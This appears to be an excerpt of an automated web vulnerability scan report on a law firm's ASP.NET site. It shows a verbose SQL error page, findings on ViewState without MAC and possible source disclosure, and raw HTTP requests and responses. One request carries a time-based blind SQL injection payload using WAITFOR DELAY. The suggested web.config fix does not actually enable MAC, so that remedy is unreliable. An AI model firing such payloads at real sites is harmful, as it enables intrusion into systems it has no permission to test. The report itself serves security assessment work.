b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
System.Data.Common.DbDataAdapter.FillLoadDataRow(SchemaMapping mapping) +175
System.Data.Common.DbDataAdapter.FillFromReader(Object data, String srcTable, IDataReader dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +260
System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, String srcTable, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +129
System.Data.Common.DbDataAdapter.FillFromCommand(Object data, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +304
System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +77
System.Data.Common.DbDataAdapter.Fill(DataSet dataSet) +38
_SaturnoTools.Library.libData.GetDataSet(String strSQL) +148
Mccarter.Saturno.Web.Biosnew.BuildSearchResults(String searchFilter)
Mccarter.Saturno.Web.Biosnew.ShowBiosByLast(String Initial)
Mccarter.Saturno.Web.Biosnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at System.Data.Common.DbDataAdapter.FillLoadDataRow(SchemaMapping mapping)
at System.Data.Common.DbDataAdapter.FillFromReader(Object data, String srcTable, IDataReader dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue)
at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, String srcTable, IDataReader dataReader, Int32 startRecord, Int32 maxRecords)
at System.Data.Common.DbDataAdapter.FillFromCommand(Object data, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior)
at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior)
at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet)
at _SaturnoTools.Library.libData.GetDataSet(String strSQL)
at Mccarter.Saturno.Web.Biosnew.BuildSearchResults(String searchFilter)
at Mccarter.Saturno.Web.Biosnew.ShowBiosByLast(String Initial)
at Mccarter.Saturno.Web.Biosnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
MAC is not Enabled in ViewState

MAC is not Enabled in ViewState

1 TOTAL
MEDIUM
Netsparker identified that the target web application does not use MAC validation in ViewState data.

Impact

An attacker can tamper with the application's state variables located in the ViewState data structure.

Remedy

ASP.NET uses a hash code based integrity solution called "ViewStateMac" to protect ViewState parameters against tampering attacks. You can implement this solution on a page or application level.

For page based protection, place the following directive at the top of affected page.
<%@Page EnableViewStateMAC=true %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web>
	<pages enableViewState="true">
</System.Web>      

Remedy References

- /new/emailpagenew.aspx

/new/emailpagenew.aspx

http://www.mccarter.com/new/emailpagenew.aspx

Parameters

Parameter Type Value
__VIEWSTATE POST dDwxMTk0OTkxNDg1O3Q8cDxsPFVSTDs O2w8aHR0cDovL3d3dy5tY2NhcnRlci5jb20vbmV3L2hvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dsb2NhdGlvbm5ldy5hc3B4JnNob3c9MTQzMzs PjtsPGk8MT47aTwzPjs O2w8dDw7bDxpPDA Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw YWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw Oz4 Ozs Oz4 O3Q8O2w8aTwxPjs O2w8dDw7bDxpPDE Oz47bDx0PHA8cDxsPFRleHQ7PjtsPGh0dHA6Ly93d3cubWNjYXJ0ZXIuY29tL25ldy9ob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93bG9jYXRpb25uZXcuYXNweCZzaG93PTE0MzM7Pj47Pjs7Pjs Pjs Pjs Pjs uWzZUbBgbpkK NRyK3EsPIpkonA=
EmailButton POST Send
EmailComments POST syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
RecipientEmail POST netsparker@example.com
RecipientName POST Smith
SenderEmail POST netsparker@example.com
SenderName POST Smith

ViewState Version

.NET Framework 1.x

Request

POST /new/emailpagenew.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/emailpagenew.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 966
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwxMTk0OTkxNDg1O3Q8cDxsPFVSTDs%2bO2w8aHR0cDovL3d3dy5tY2NhcnRlci5jb20vbmV3L2hvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dsb2NhdGlvbm5ldy5hc3B4JnNob3c9MTQzMzs%2bPjtsPGk8MT47aTwzPjs%2bO2w8dDw7bDxpPDA%2bOz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw%2bYWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw%2bOz4%2bOzs%2bOz4%2bO3Q8O2w8aTwxPjs%2bO2w8dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPGh0dHA6Ly93d3cubWNjYXJ0ZXIuY29tL25ldy9ob21lbmV3LmFzcHg%2fc2VhcmNobGluaz1zaG93bG9jYXRpb25uZXcuYXNweCZzaG93PTE0MzM7Pj47Pjs7Pjs%2bPjs%2bPjs%2bPjs%2buWzZUbBgbpkK%2bNRyK3EsPIpkonA%3d&EmailButton=Send&EmailComments=syscolumns+WHERE+2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--&RecipientEmail=netsparker%40example.com&RecipientName=Smith&SenderEmail=netsparker%40example.com&SenderName=Smith

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:44:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11162



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css"> P { FONT-SIZE: 11px; COLOR: #969696; FONT-FAMILY: Arial } TD { FONT-SIZE: 11px; COLOR: #969696; FONT-FAMILY: Arial } DIV { FONT-SIZE: 11px; COLOR: #969696; FONT-FAMILY: Arial } SPAN { FONT-SIZE: 11px; COLOR: #969696; FONT-FAMILY: Arial } FONT { FONT-SIZE: 11px; COLOR: #969696; FONT-FAMILY: Arial } A { COLOR: #ffffff; TEXT-DECORATION: none } A:hover { COLOR: #ffffff; TEXT-DECORATION: none } BODY { SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #ffffff; SCROLLBAR-TRACK-COLOR: #000000; SCROLLBAR-DARKSHADOW-COLOR: #000000 } </style>

</HEAD>

<body vLink="#969696" aLink="#969696" link="#969696" style="PADDING-RIGHT:10px;MARGIN-TOP:10px;BACKGROUND:black;MARGIN-BOTTOM:0px;MARGIN-LEFT:0px;WIDTH:452px">
<form name="Form1" method="post" action="emailpagenew.aspx" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwxMTk0OTkxNDg1O3Q8cDxsPFVSTDs+O2w8aHR0cDovL3d3dy5tY2NhcnRlci5jb20vbmV3L2hvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dsb2NhdGlvbm5ldy5hc3B4JnNob3c9MTQzMzs+PjtsPGk8MT47aTwzPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw+YWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjtpPDM+Oz47bDx0PHA8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47PjtsPGk8MT47aTwzPjtpPDU+O2k8Nz47aTw5PjtpPDExPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxodHRwOi8vd3d3Lm1jY2FydGVyLmNvbS9uZXcvaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2xvY2F0aW9ubmV3LmFzcHgmc2hvdz0xNDMzOz4+Oz47Oz47dDxwPHA8bDxUZXh0Oz47bDxTbWl0aDs+Pjs+Ozs+O3Q8cDxwPGw8VGV4dDs+O2w8bmV0c3BhcmtlckBleGFtcGxlLmNvbTs+Pjs+Ozs+O3Q8cDxwPGw8VGV4dDs+O2w8U21pdGg7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7PjtsPG5ldHNwYXJrZXJAZXhhbXBsZS5jb207Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7PjtsPHN5c2NvbHVtbnMgV0hFUkUgMlw+M1w7REVDTEFSRS8qKi9AeC8qKi9jaGFyKDkpXDtTRVQvKiovQHg9Y2hhcig0OCkrY2hhcig1OCkrY2hhcig0OCkrY2hhcig1OCkrY2hhcig1MCkrY2hhcig1MylcO1dBSVRGT1IvKiovREVMQVkvKiovQHgtLTs+Pjs+Ozs+Oz4+O3Q8cDxwPGw8VmlzaWJsZTs+O2w8bzx0Pjs+Pjs+Ozs+Oz4+Oz4+Oz6SipWOlu4VASw0n0O1fMC5AnsBLA==" />

<script language="javascript">
//alert(document.referrer)
//EmailPageLabel.Text = document.referrer
</script>
<table id="pageTable" cellSpacing="0" cellPadding="0" align="right" bgColor="#000000" border="0">
<tr>
<td width="15">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
<td><img src="images/new mccarter/subtitles/emailthispage.jpg" border="0" width="289" height="75"></td>
<td width="15">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
</tr>
<tr>
<td width="15">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
<td width="100%" valign="bottom">
<!--Begin content cell-->
<table cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<table cellspacing="0" cellpadding="0">
<tr>
<td width="5%">&nbsp;</td>
<td width="88%">&nbsp;</td>
<td width="7%">&nbsp;</td>
</tr>
<tr>
<td height="19">&nbsp;</td>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><table border="0" cellspacing="0" cellpadding="0">
<tr>
<td valign="top">

<div id="EmailSentPanel">

<DIV class="bodycopy_wh" style="FONT-WEIGHT: bold; FONT-SIZE: 12px">Your message
has been successfully sent.</DIV>

</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<!--End content cell-->
</td>
</tr>
</table>
</form>
<script language="Javascript">
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:"){
document.links[i].onclick = function () {return emailWarning();}
}
}
</script>
</body>
</HTML>
[Possible] ASP.NET Source Code Disclosure

[Possible] ASP.NET Source Code Disclosure

1 TOTAL
MEDIUM
Netsparker identified a web page that discloses server side source code. An attacker can obtain the source code of the web application, which can contain sensitive data such as "database connection strings", "username" and "password". Operational and technical logic of the application can also be revealed.

Impact

Depending on the nature of the source code disclosed an attacker can mount one or more of the following types of attacks:

Actions to Take

  1. Confirm exactly what aspects of the source code is actually disclosed; due limitations of these types of vulnerability it might not be possible to confirm this in all instances. Confirm this is not intended functionality.
  2. If it is a file required by the application, change its permissions to prevent public users from accessing it. If it is not, then remove it from the web server.
  3. Ensure that the server has all the current security patches applied.
  4. Remove all temporary and backup files from the web server.

Required Skills for Successful Exploitation

This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application.

External References

- /new/contactnew.aspx

/new/contactnew.aspx

http://www.mccarter.com/new/contactnew.aspx

Request

GET /new/contactnew.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=contactnew
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14238



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">
P,TD { FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: Arial }
FONT { FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: Arial }
A { COLOR: #000000; TEXT-DECORATION: none }
A:hover { COLOR: #000000; TEXT-DECORATION: none }
BODY { SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #ffffff; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="MARGIN-TOP:10px;MARGIN-BOTTOM:0px;MARGIN-LEFT:0px"
onLoad="decryptAll();">
<form name="Form1" method="post" action="contactnew.aspx" id="Form1">
